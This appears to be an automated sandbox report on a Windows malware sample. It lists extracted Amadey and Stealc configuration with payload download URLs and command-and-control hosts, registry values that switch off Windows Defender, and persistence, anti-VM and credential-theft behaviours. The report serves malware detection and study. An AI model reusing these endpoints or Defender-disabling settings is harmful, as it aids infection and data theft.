Analysis
-
max time kernel
145s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
06/03/2025, 01:21
Static task
static1
Behavioral task
behavioral1
Sample
8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
Resource
win10v2004-20250217-en
General
-
Target
8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe
-
Size
938KB
-
MD5
100bd6bacfe8cde2b3d01379c45e9282
-
SHA1
5af8a1c8556ee19da4a43d1c9a5fced8960fb751
-
SHA256
8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c
-
SHA512
b6e02ef0adde68a5dcbd707c8bbb4dd0ff705c48b53cc5b4d1ff4a6eec772668a2c80ee1a61bd6d9906a8ab9412ea7904d293281de4ad3afff5b782e444600ef
-
SSDEEP
24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8aylF:VTvC/MTQYxsWR7ayl
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5848-783-0x0000000000E10000-0x000000000125E000-memory.dmp healer behavioral2/memory/5848-786-0x0000000000E10000-0x000000000125E000-memory.dmp healer behavioral2/memory/5848-953-0x0000000000E10000-0x000000000125E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" dd29a77f54.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" dd29a77f54.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" dd29a77f54.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection dd29a77f54.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" dd29a77f54.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" dd29a77f54.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" dd29a77f54.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" dd29a77f54.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications dd29a77f54.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" dd29a77f54.exe -
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/files/0x0008000000023c8d-75.dat family_stormkitty behavioral2/memory/2848-84-0x0000000000B50000-0x0000000000BE4000-memory.dmp family_stormkitty -
Stormkitty family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 561b99cbf5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 49309c0b92.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1f3ecc566c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a53c2ef5e2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3a82a50014.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 88J2R05CLKFFTOLX.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dd29a77f54.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 11 2896 powershell.exe 64 4960 powershell.exe 65 1180 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2896 powershell.exe 4960 powershell.exe 1180 powershell.exe 4408 powershell.exe 4492 powershell.exe 1880 powershell.exe -
Downloads MZ/PE file 16 IoCs
flow pid Process 65 1180 powershell.exe 33 796 rapes.exe 33 796 rapes.exe 33 796 rapes.exe 33 796 rapes.exe 33 796 rapes.exe 33 796 rapes.exe 90 2392 BitLockerToGo.exe 109 796 rapes.exe 109 796 rapes.exe 109 796 rapes.exe 233 796 rapes.exe 123 4288 a53c2ef5e2.exe 85 4168 BitLockerToGo.exe 11 2896 powershell.exe 64 4960 powershell.exe -
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dd29a77f54.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 49309c0b92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 561b99cbf5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1f3ecc566c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a53c2ef5e2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3a82a50014.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 88J2R05CLKFFTOLX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 88J2R05CLKFFTOLX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a53c2ef5e2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3a82a50014.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 561b99cbf5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 49309c0b92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1f3ecc566c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dd29a77f54.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation BUZd3Mq.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation nhDLtPT.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE -
Executes dropped EXE 23 IoCs
pid Process 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE 796 rapes.exe 4028 BUZd3Mq.exe 2848 Build.exe 4936 0c6733a3b9.exe 1116 TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE 2100 2asf3YX.exe 4148 483d2fa8a0d53818306efeb32d3.exe 4904 561b99cbf5.exe 636 5830bccfba.exe 1716 5830bccfba.exe 4324 rapes.exe 684 49309c0b92.exe 5008 1f3ecc566c.exe 4288 a53c2ef5e2.exe 1120 3a82a50014.exe 3464 68a19ce725.exe 1536 88J2R05CLKFFTOLX.exe 5848 dd29a77f54.exe 1424 2asf3YX.exe 3780 rapes.exe 5288 nhDLtPT.exe 5440 Gxtuum.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 49309c0b92.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 3a82a50014.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 561b99cbf5.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 1f3ecc566c.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine a53c2ef5e2.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 88J2R05CLKFFTOLX.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine dd29a77f54.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" dd29a77f54.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features dd29a77f54.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Build.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\68a19ce725.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108770101\\68a19ce725.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dd29a77f54.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108780101\\dd29a77f54.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0c6733a3b9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\0c6733a3b9.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a53c2ef5e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108750101\\a53c2ef5e2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3a82a50014.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108760101\\3a82a50014.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 42 ipinfo.io 43 ipinfo.io 66 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023cac-137.dat autoit_exe behavioral2/files/0x0007000000023d3b-482.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE 796 rapes.exe 1116 TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE 4148 483d2fa8a0d53818306efeb32d3.exe 4904 561b99cbf5.exe 4324 rapes.exe 684 49309c0b92.exe 5008 1f3ecc566c.exe 4288 a53c2ef5e2.exe 1120 3a82a50014.exe 1536 88J2R05CLKFFTOLX.exe 5848 dd29a77f54.exe 3780 rapes.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 636 set thread context of 1716 636 5830bccfba.exe 150 PID 4904 set thread context of 4168 4904 561b99cbf5.exe 154 PID 684 set thread context of 2392 684 49309c0b92.exe 157 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE File created C:\Windows\Tasks\Gxtuum.job nhDLtPT.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 2304 2848 WerFault.exe 105 2488 636 WerFault.exe 149 -
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5830bccfba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5830bccfba.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 49309c0b92.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a53c2ef5e2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 68a19ce725.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 561b99cbf5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a82a50014.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BUZd3Mq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0c6733a3b9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1f3ecc566c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 68a19ce725.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dd29a77f54.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 68a19ce725.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88J2R05CLKFFTOLX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3152 cmd.exe 2804 netsh.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Build.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 2asf3YX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 2asf3YX.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4224 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 4824 taskkill.exe 3832 taskkill.exe 4072 taskkill.exe 4156 taskkill.exe 4408 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings BUZd3Mq.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1728 schtasks.exe 3272 schtasks.exe 3152 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2896 powershell.exe 2896 powershell.exe 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE 2932 TempVFEBH7OAHZNTRQBATY3VJGWKSA8CRWCF.EXE 796 rapes.exe 796 rapes.exe 2848 Build.exe 2848 Build.exe 4960 powershell.exe 4960 powershell.exe 4960 powershell.exe 4408 powershell.exe 4408 powershell.exe 4408 powershell.exe 1116 TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE 1116 TempL15IXT4HYZ2ESTVJPYU9FDMMYBPMMTXI.EXE 4492 powershell.exe 4492 powershell.exe 4492 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1180 powershell.exe 1180 powershell.exe 1180 powershell.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 2100 2asf3YX.exe 4148 483d2fa8a0d53818306efeb32d3.exe 4148 483d2fa8a0d53818306efeb32d3.exe 4904 561b99cbf5.exe 4904 561b99cbf5.exe 1716 5830bccfba.exe 1716 5830bccfba.exe 1716 5830bccfba.exe 1716 5830bccfba.exe 4324 rapes.exe 4324 rapes.exe 684 49309c0b92.exe 684 49309c0b92.exe 5008 1f3ecc566c.exe 5008 1f3ecc566c.exe 5008 1f3ecc566c.exe 5008 1f3ecc566c.exe 5008 1f3ecc566c.exe 5008 1f3ecc566c.exe 4288 a53c2ef5e2.exe 4288 a53c2ef5e2.exe 4288 a53c2ef5e2.exe 4288 a53c2ef5e2.exe 4288 a53c2ef5e2.exe 4288 a53c2ef5e2.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 2848 Build.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeDebugPrivilege 4492 powershell.exe Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 1180 powershell.exe Token: SeDebugPrivilege 2100 2asf3YX.exe Token: SeDebugPrivilege 636 5830bccfba.exe Token: SeDebugPrivilege 4156 taskkill.exe Token: SeDebugPrivilege 4408 taskkill.exe Token: SeDebugPrivilege 4824 taskkill.exe Token: SeDebugPrivilege 3832 taskkill.exe Token: SeDebugPrivilege 4072 taskkill.exe Token: SeDebugPrivilege 516 firefox.exe Token: SeDebugPrivilege 516 firefox.exe Token: SeDebugPrivilege 5848 dd29a77f54.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
